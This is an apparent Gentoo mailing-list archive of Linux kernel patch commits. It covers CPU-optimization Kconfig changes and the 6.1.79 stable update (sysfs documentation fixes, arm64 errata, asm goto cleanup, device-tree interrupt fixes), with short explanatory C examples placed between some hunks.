 +	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
 +	|| MNATIVE_INTEL || MNATIVE_AMD) || X86_64
- 
+
  config X86_CMPXCHG64
  	def_bool y
 -	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8
@@ -601,7 +602,7 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE \
 +	|| MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
 +	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
- 
+
  # this should be set for all -march=.. options where the compiler
  # generates cmov.
  config X86_CMOV
@@ -614,13 +615,13 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
 +	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD)
- 
+
  config X86_MINIMUM_CPU_FAMILY
  	int
  	default "64" if X86_64
--	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8)
+-	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCORE2 || MK7 || MK8)
 +	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 \
-+	|| MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8 ||  MK8SSE3 \
++	|| MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCORE2 || MK7 || MK8 ||  MK8SSE3 \
 +	|| MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER \
 +	|| MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT \
 +	|| MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL \
@@ -629,20 +630,20 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MNATIVE_INTEL || MNATIVE_AMD)
  	default "5" if X86_32 && X86_CMPXCHG64
  	default "4"
- 
+
  config X86_DEBUGCTLMSR
  	def_bool y
 -	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 || M486SX || M486) && !UML
 +	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 \
 +	|| M486SX || M486) && !UML
- 
+
  config IA32_FEAT_CTL
  	def_bool y
 diff --git a/arch/x86/Makefile b/arch/x86/Makefile
-index 415a5d138de4..17b1e039d955 100644
+index 1a068de12..23b2ec69d 100644
 --- a/arch/x86/Makefile
 +++ b/arch/x86/Makefile
-@@ -151,8 +151,48 @@ else
+@@ -152,8 +152,48 @@ else
          # FIXME - should be integrated in Makefile.cpu (Makefile_32.cpu)
          cflags-$(CONFIG_MK8)		+= -march=k8
          cflags-$(CONFIG_MPSC)		+= -march=nocona
@@ -692,9 +693,9 @@ index 415a5d138de4..17b1e039d955 100644
 +        cflags-$(CONFIG_GENERIC_CPU4) 	+= -march=x86-64-v4
          cflags-$(CONFIG_GENERIC_CPU)	+= -mtune=generic
          KBUILD_CFLAGS += $(cflags-y)
- 
+
 diff --git a/arch/x86/include/asm/vermagic.h b/arch/x86/include/asm/vermagic.h
-index 75884d2cdec3..02c1386eb653 100644
+index 75884d2cd..02c1386eb 100644
 --- a/arch/x86/include/asm/vermagic.h
 +++ b/arch/x86/include/asm/vermagic.h
 @@ -17,6 +17,54 @@
@@ -785,5 +786,5 @@ index 75884d2cdec3..02c1386eb653 100644
  #elif defined CONFIG_MELAN
  #define MODULE_PROC_FAMILY "ELAN "
  #elif defined CONFIG_MCRUSOE
--- 
-2.39.0
+--
+2.43.0.232.ge79552d197
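
The ISA levels the patch description lists can also be probed in code:
recent compilers accept the level names in __builtin_cpu_supports().
A short sketch (assumes GCC 12 or newer, or a similarly recent Clang,
on an x86-64 host):

  #include <stdio.h>

  int main(void)
  {
          __builtin_cpu_init();  /* only required before main(); harmless here */

          /* The names mirror the GENERIC_CPU2..4 options added above. */
          printf("x86-64-v2: %s\n", __builtin_cpu_supports("x86-64-v2") ? "yes" : "no");
          printf("x86-64-v3: %s\n", __builtin_cpu_supports("x86-64-v3") ? "yes" : "no");
          printf("x86-64-v4: %s\n", __builtin_cpu_supports("x86-64-v4") ? "yes" : "no");
          return 0;
  }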


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-02-23 12:37 Mike Pagano
From: Mike Pagano @ 2024-02-23 12:37 UTC
  To: gentoo-commits

commit:     c01acf6f609ce49d27c723598d558377d83d6681
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Feb 23 12:37:18 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Feb 23 12:37:18 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c01acf6f

Linux patch 6.1.79

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1078_linux-6.1.79.patch | 9468 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9472 insertions(+)

diff --git a/0000_README b/0000_README
index 7d732a84..4d09930e 100644
--- a/0000_README
+++ b/0000_README
@@ -355,6 +355,10 @@ Patch:  1077_linux-6.1.78.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.78
 
+Patch:  1078_linux-6.1.79.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.79
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1078_linux-6.1.79.patch b/1078_linux-6.1.79.patch
new file mode 100644
index 00000000..1136d033
--- /dev/null
+++ b/1078_linux-6.1.79.patch
@@ -0,0 +1,9468 @@
+diff --git a/Documentation/ABI/testing/sysfs-class-net-statistics b/Documentation/ABI/testing/sysfs-class-net-statistics
+index 55db27815361b..53e508c6936a5 100644
+--- a/Documentation/ABI/testing/sysfs-class-net-statistics
++++ b/Documentation/ABI/testing/sysfs-class-net-statistics
+@@ -1,4 +1,4 @@
+-What:		/sys/class/<iface>/statistics/collisions
++What:		/sys/class/net/<iface>/statistics/collisions
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -6,7 +6,7 @@ Description:
+ 		Indicates the number of collisions seen by this network device.
+ 		This value might not be relevant with all MAC layers.
+ 
+-What:		/sys/class/<iface>/statistics/multicast
++What:		/sys/class/net/<iface>/statistics/multicast
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -14,7 +14,7 @@ Description:
+ 		Indicates the number of multicast packets received by this
+ 		network device.
+ 
+-What:		/sys/class/<iface>/statistics/rx_bytes
++What:		/sys/class/net/<iface>/statistics/rx_bytes
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -23,7 +23,7 @@ Description:
+ 		See the network driver for the exact meaning of when this
+ 		value is incremented.
+ 
+-What:		/sys/class/<iface>/statistics/rx_compressed
++What:		/sys/class/net/<iface>/statistics/rx_compressed
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -32,7 +32,7 @@ Description:
+ 		network device. This value might only be relevant for interfaces
+ 		that support packet compression (e.g: PPP).
+ 
+-What:		/sys/class/<iface>/statistics/rx_crc_errors
++What:		/sys/class/net/<iface>/statistics/rx_crc_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -41,7 +41,7 @@ Description:
+ 		by this network device. Note that the specific meaning might
+ 		depend on the MAC layer used by the interface.
+ 
+-What:		/sys/class/<iface>/statistics/rx_dropped
++What:		/sys/class/net/<iface>/statistics/rx_dropped
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -51,7 +51,7 @@ Description:
+ 		packet processing. See the network driver for the exact
+ 		meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_errors
++What:		/sys/class/net/<iface>/statistics/rx_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -59,7 +59,7 @@ Description:
+ 		Indicates the number of receive errors on this network device.
+ 		See the network driver for the exact meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_fifo_errors
++What:		/sys/class/net/<iface>/statistics/rx_fifo_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -68,7 +68,7 @@ Description:
+ 		network device. See the network driver for the exact
+ 		meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_frame_errors
++What:		/sys/class/net/<iface>/statistics/rx_frame_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -78,7 +78,7 @@ Description:
+ 		on the MAC layer protocol used. See the network driver for
+ 		the exact meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_length_errors
++What:		/sys/class/net/<iface>/statistics/rx_length_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -87,7 +87,7 @@ Description:
+ 		error, oversized or undersized. See the network driver for the
+ 		exact meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_missed_errors
++What:		/sys/class/net/<iface>/statistics/rx_missed_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -96,7 +96,7 @@ Description:
+ 		due to lack of capacity in the receive side. See the network
+ 		driver for the exact meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_nohandler
++What:		/sys/class/net/<iface>/statistics/rx_nohandler
+ Date:		February 2016
+ KernelVersion:	4.6
+ Contact:	netdev@vger.kernel.org
+@@ -104,7 +104,7 @@ Description:
+ 		Indicates the number of received packets that were dropped on
+ 		an inactive device by the network core.
+ 
+-What:		/sys/class/<iface>/statistics/rx_over_errors
++What:		/sys/class/net/<iface>/statistics/rx_over_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -114,7 +114,7 @@ Description:
+ 		(e.g: larger than MTU). See the network driver for the exact
+ 		meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_packets
++What:		/sys/class/net/<iface>/statistics/rx_packets
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -122,7 +122,7 @@ Description:
+ 		Indicates the total number of good packets received by this
+ 		network device.
+ 
+-What:		/sys/class/<iface>/statistics/tx_aborted_errors
++What:		/sys/class/net/<iface>/statistics/tx_aborted_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -132,7 +132,7 @@ Description:
+ 		a medium collision). See the network driver for the exact
+ 		meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/tx_bytes
++What:		/sys/class/net/<iface>/statistics/tx_bytes
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -143,7 +143,7 @@ Description:
+ 		transmitted packets or all packets that have been queued for
+ 		transmission.
+ 
+-What:		/sys/class/<iface>/statistics/tx_carrier_errors
++What:		/sys/class/net/<iface>/statistics/tx_carrier_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -152,7 +152,7 @@ Description:
+ 		because of carrier errors (e.g: physical link down). See the
+ 		network driver for the exact meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/tx_compressed
++What:		/sys/class/net/<iface>/statistics/tx_compressed
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -161,7 +161,7 @@ Description:
+ 		this might only be relevant for devices that support
+ 		compression (e.g: PPP).
+ 
+-What:		/sys/class/<iface>/statistics/tx_dropped
++What:		/sys/class/net/<iface>/statistics/tx_dropped
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -170,7 +170,7 @@ Description:
+ 		See the driver for the exact reasons as to why the packets were
+ 		dropped.
+ 
+-What:		/sys/class/<iface>/statistics/tx_errors
++What:		/sys/class/net/<iface>/statistics/tx_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -179,7 +179,7 @@ Description:
+ 		a network device. See the driver for the exact reasons as to
+ 		why the packets were dropped.
+ 
+-What:		/sys/class/<iface>/statistics/tx_fifo_errors
++What:		/sys/class/net/<iface>/statistics/tx_fifo_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -188,7 +188,7 @@ Description:
+ 		FIFO error. See the driver for the exact reasons as to why the
+ 		packets were dropped.
+ 
+-What:		/sys/class/<iface>/statistics/tx_heartbeat_errors
++What:		/sys/class/net/<iface>/statistics/tx_heartbeat_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -197,7 +197,7 @@ Description:
+ 		reported as heartbeat errors. See the driver for the exact
+ 		reasons as to why the packets were dropped.
+ 
+-What:		/sys/class/<iface>/statistics/tx_packets
++What:		/sys/class/net/<iface>/statistics/tx_packets
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -206,7 +206,7 @@ Description:
+ 		device. See the driver for whether this reports the number of all
+ 		attempted or successful transmissions.
+ 
+-What:		/sys/class/<iface>/statistics/tx_window_errors
++What:		/sys/class/net/<iface>/statistics/tx_window_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
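
Reading one of these counters from userspace is a one-liner at the
corrected path; a small sketch ("lo" is just an example interface):

  #include <stdio.h>

  int main(void)
  {
          unsigned long long rx_bytes;
          FILE *f = fopen("/sys/class/net/lo/statistics/rx_bytes", "r");

          if (!f) {
                  perror("rx_bytes");
                  return 1;
          }
          if (fscanf(f, "%llu", &rx_bytes) != 1) {
                  fclose(f);
                  return 1;
          }
          fclose(f);
          printf("rx_bytes: %llu\n", rx_bytes);
          return 0;
  }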
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index d9fce65b2f047..27135b9c07acb 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -221,3 +221,10 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | Fujitsu        | A64FX           | E#010001        | FUJITSU_ERRATUM_010001      |
+ +----------------+-----------------+-----------------+-----------------------------+
+++----------------+-----------------+-----------------+-----------------------------+
++| Microsoft      | Azure Cobalt 100| #2139208        | ARM64_ERRATUM_2139208       |
+++----------------+-----------------+-----------------+-----------------------------+
++| Microsoft      | Azure Cobalt 100| #2067961        | ARM64_ERRATUM_2067961       |
+++----------------+-----------------+-----------------+-----------------------------+
++| Microsoft      | Azure Cobalt 100| #2253138        | ARM64_ERRATUM_2253138       |
+++----------------+-----------------+-----------------+-----------------------------+
+diff --git a/Documentation/devicetree/bindings/net/wireless/marvell-8xxx.txt b/Documentation/devicetree/bindings/net/wireless/marvell-8xxx.txt
+index 9bf9bbac16e25..cdc303caf5f45 100644
+--- a/Documentation/devicetree/bindings/net/wireless/marvell-8xxx.txt
++++ b/Documentation/devicetree/bindings/net/wireless/marvell-8xxx.txt
+@@ -1,4 +1,4 @@
+-Marvell 8787/8897/8997 (sd8787/sd8897/sd8997/pcie8997) SDIO/PCIE devices
++Marvell 8787/8897/8978/8997 (sd8787/sd8897/sd8978/sd8997/pcie8997) SDIO/PCIE devices
+ ------
+ 
+ This node provides properties for controlling the Marvell SDIO/PCIE wireless device.
+@@ -10,7 +10,9 @@ Required properties:
+   - compatible : should be one of the following:
+ 	* "marvell,sd8787"
+ 	* "marvell,sd8897"
++	* "marvell,sd8978"
+ 	* "marvell,sd8997"
++	* "nxp,iw416"
+ 	* "pci11ab,2b42"
+ 	* "pci1b4b,2b42"
+ 
+diff --git a/Makefile b/Makefile
+index e93554269e474..d6bc9f597e8b8 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 78
++SUBLEVEL = 79
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+@@ -459,8 +459,7 @@ HOSTRUSTC = rustc
+ HOSTPKG_CONFIG	= pkg-config
+ 
+ KBUILD_USERHOSTCFLAGS := -Wall -Wmissing-prototypes -Wstrict-prototypes \
+-			 -O2 -fomit-frame-pointer -std=gnu11 \
+-			 -Wdeclaration-after-statement
++			 -O2 -fomit-frame-pointer -std=gnu11
+ KBUILD_USERCFLAGS  := $(KBUILD_USERHOSTCFLAGS) $(USERCFLAGS)
+ KBUILD_USERLDFLAGS := $(USERLDFLAGS)
+ 
+@@ -1018,9 +1017,6 @@ endif
+ # arch Makefile may override CC so keep this after arch Makefile is included
+ NOSTDINC_FLAGS += -nostdinc
+ 
+-# warn about C99 declaration after statement
+-KBUILD_CFLAGS += -Wdeclaration-after-statement
+-
+ # Variable Length Arrays (VLAs) should not be used anywhere in the kernel
+ KBUILD_CFLAGS += -Wvla
+ 
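
The dropped -Wdeclaration-after-statement flag warned about mixing
declarations into code, which C99 made legal; a trivial sketch of the
style the kernel build now permits:

  #include <stdio.h>

  int main(void)
  {
          printf("a statement first\n");

          int x = 42;  /* declaration after a statement: valid since C99 */

          printf("x = %d\n", x);
          return 0;
  }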
+diff --git a/arch/Kconfig b/arch/Kconfig
+index 14273a6203dfc..f99fd9a4ca778 100644
+--- a/arch/Kconfig
++++ b/arch/Kconfig
+@@ -642,6 +642,7 @@ config SHADOW_CALL_STACK
+ 	bool "Shadow Call Stack"
+ 	depends on ARCH_SUPPORTS_SHADOW_CALL_STACK
+ 	depends on DYNAMIC_FTRACE_WITH_ARGS || DYNAMIC_FTRACE_WITH_REGS || !FUNCTION_GRAPH_TRACER
++	depends on MMU
+ 	help
+ 	  This option enables the compiler's Shadow Call Stack, which
+ 	  uses a shadow stack to protect function return addresses from
+diff --git a/arch/arc/include/asm/jump_label.h b/arch/arc/include/asm/jump_label.h
+index 9d96180797396..a339223d9e052 100644
+--- a/arch/arc/include/asm/jump_label.h
++++ b/arch/arc/include/asm/jump_label.h
+@@ -31,7 +31,7 @@
+ static __always_inline bool arch_static_branch(struct static_key *key,
+ 					       bool branch)
+ {
+-	asm_volatile_goto(".balign "__stringify(JUMP_LABEL_NOP_SIZE)"	\n"
++	asm goto(".balign "__stringify(JUMP_LABEL_NOP_SIZE)"		\n"
+ 		 "1:							\n"
+ 		 "nop							\n"
+ 		 ".pushsection __jump_table, \"aw\"			\n"
+@@ -47,7 +47,7 @@ static __always_inline bool arch_static_branch(struct static_key *key,
+ static __always_inline bool arch_static_branch_jump(struct static_key *key,
+ 						    bool branch)
+ {
+-	asm_volatile_goto(".balign "__stringify(JUMP_LABEL_NOP_SIZE)"	\n"
++	asm goto(".balign "__stringify(JUMP_LABEL_NOP_SIZE)"		\n"
+ 		 "1:							\n"
+ 		 "b %l[l_yes]						\n"
+ 		 ".pushsection __jump_table, \"aw\"			\n"
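
An "asm goto" statement is implicitly volatile, so the old
asm_volatile_goto() wrapper (historically a workaround for ancient GCC
miscompiles) adds nothing for these label-only uses, and the patch
spells them plainly across all the architectures that follow. A minimal
sketch of the construct itself (x86-64 assembly under GNU C, so it
assumes GCC or Clang on an x86-64 host):

  #include <stdio.h>

  /* The asm may jump to any label in its label list; here it branches
   * to l_yes when x is non-zero. */
  static int branch_if_nonzero(int x)
  {
          asm goto("test %0, %0\n\t"
                   "jnz %l[l_yes]"
                   : /* no outputs (not allowed before GCC 11) */
                   : "r" (x)
                   : "cc"
                   : l_yes);
          return 0;
  l_yes:
          return 1;
  }

  int main(void)
  {
          printf("%d %d\n", branch_if_nonzero(0), branch_if_nonzero(7));
          return 0;
  }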
+diff --git a/arch/arm/boot/dts/imx6q-apalis-ixora-v1.2.dts b/arch/arm/boot/dts/imx6q-apalis-ixora-v1.2.dts
+index f9f7d99bd4db8..76f3e07bc8826 100644
+--- a/arch/arm/boot/dts/imx6q-apalis-ixora-v1.2.dts
++++ b/arch/arm/boot/dts/imx6q-apalis-ixora-v1.2.dts
+@@ -76,6 +76,7 @@ reg_can1_supply: regulator-can1-supply {
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_enable_can1_power>;
+ 		regulator-name = "can1_supply";
++		startup-delay-us = <1000>;
+ 	};
+ 
+ 	reg_can2_supply: regulator-can2-supply {
+@@ -85,6 +86,7 @@ reg_can2_supply: regulator-can2-supply {
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_enable_can2_power>;
+ 		regulator-name = "can2_supply";
++		startup-delay-us = <1000>;
+ 	};
+ };
+ 
+diff --git a/arch/arm/include/asm/jump_label.h b/arch/arm/include/asm/jump_label.h
+index e12d7d096fc03..e4eb54f6cd9fe 100644
+--- a/arch/arm/include/asm/jump_label.h
++++ b/arch/arm/include/asm/jump_label.h
+@@ -11,7 +11,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 WASM(nop) "\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".word 1b, %l[l_yes], %c0\n\t"
+@@ -25,7 +25,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 WASM(b) " %l[l_yes]\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".word 1b, %l[l_yes], %c0\n\t"
+diff --git a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+index 9d116e1fbe10c..1ac4f8c24e231 100644
+--- a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
++++ b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+@@ -169,10 +169,6 @@ led@6 {
+ 	};
+ };
+ 
+-&blsp_dma {
+-	status = "okay";
+-};
+-
+ &blsp_i2c2 {
+ 	/* On Low speed expansion */
+ 	status = "okay";
+diff --git a/arch/arm64/boot/dts/qcom/msm8916.dtsi b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+index bafac2cf7e3d6..987cebbda0571 100644
+--- a/arch/arm64/boot/dts/qcom/msm8916.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+@@ -1522,7 +1522,7 @@ blsp_dma: dma-controller@7884000 {
+ 			clock-names = "bam_clk";
+ 			#dma-cells = <1>;
+ 			qcom,ee = <0>;
+-			status = "disabled";
++			qcom,controlled-remotely;
+ 		};
+ 
+ 		blsp1_uart1: serial@78af000 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index 4d5905ef0b411..95c515da9f2e0 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -4049,7 +4049,7 @@ usb_1: usb@a6f8800 {
+ 			assigned-clock-rates = <19200000>, <150000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&intc GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc_intc 6 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&pdc_intc 8 IRQ_TYPE_EDGE_BOTH>,
+ 					      <&pdc_intc 9 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+@@ -4100,7 +4100,7 @@ usb_2: usb@a8f8800 {
+ 			assigned-clock-rates = <19200000>, <150000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&intc GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc_intc 7 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&pdc_intc 10 IRQ_TYPE_EDGE_BOTH>,
+ 					      <&pdc_intc 11 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index 8efd0e227d780..eb1a9369926d2 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -3629,7 +3629,7 @@ usb_1: usb@a6f8800 {
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&intc GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 6 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&pdc 8 IRQ_TYPE_EDGE_BOTH>,
+ 					      <&pdc 9 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+@@ -3678,7 +3678,7 @@ usb_2: usb@a8f8800 {
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&intc GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 7 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&pdc 10 IRQ_TYPE_EDGE_BOTH>,
+ 					      <&pdc 11 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+diff --git a/arch/arm64/include/asm/alternative-macros.h b/arch/arm64/include/asm/alternative-macros.h
+index 3622e9f4fb442..51738c56e96cd 100644
+--- a/arch/arm64/include/asm/alternative-macros.h
++++ b/arch/arm64/include/asm/alternative-macros.h
+@@ -229,7 +229,7 @@ alternative_has_feature_likely(unsigned long feature)
+ 	compiletime_assert(feature < ARM64_NCAPS,
+ 			   "feature must be < ARM64_NCAPS");
+ 
+-	asm_volatile_goto(
++	asm goto(
+ 	ALTERNATIVE_CB("b	%l[l_no]", %[feature], alt_cb_patch_nops)
+ 	:
+ 	: [feature] "i" (feature)
+@@ -247,7 +247,7 @@ alternative_has_feature_unlikely(unsigned long feature)
+ 	compiletime_assert(feature < ARM64_NCAPS,
+ 			   "feature must be < ARM64_NCAPS");
+ 
+-	asm_volatile_goto(
++	asm goto(
+ 	ALTERNATIVE("nop", "b	%l[l_yes]", %[feature])
+ 	:
+ 	: [feature] "i" (feature)
+diff --git a/arch/arm64/include/asm/cputype.h b/arch/arm64/include/asm/cputype.h
+index 7dce9c0aa7836..af3a678a76b3a 100644
+--- a/arch/arm64/include/asm/cputype.h
++++ b/arch/arm64/include/asm/cputype.h
+@@ -61,6 +61,7 @@
+ #define ARM_CPU_IMP_HISI		0x48
+ #define ARM_CPU_IMP_APPLE		0x61
+ #define ARM_CPU_IMP_AMPERE		0xC0
++#define ARM_CPU_IMP_MICROSOFT		0x6D
+ 
+ #define ARM_CPU_PART_AEM_V8		0xD0F
+ #define ARM_CPU_PART_FOUNDATION		0xD00
+@@ -128,6 +129,8 @@
+ 
+ #define AMPERE_CPU_PART_AMPERE1		0xAC3
+ 
++#define MICROSOFT_CPU_PART_AZURE_COBALT_100	0xD49 /* Based on r0p0 of ARM Neoverse N2 */
++
+ #define MIDR_CORTEX_A53 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A53)
+ #define MIDR_CORTEX_A57 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A57)
+ #define MIDR_CORTEX_A72 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A72)
+@@ -179,6 +182,7 @@
+ #define MIDR_APPLE_M1_ICESTORM_MAX MIDR_CPU_MODEL(ARM_CPU_IMP_APPLE, APPLE_CPU_PART_M1_ICESTORM_MAX)
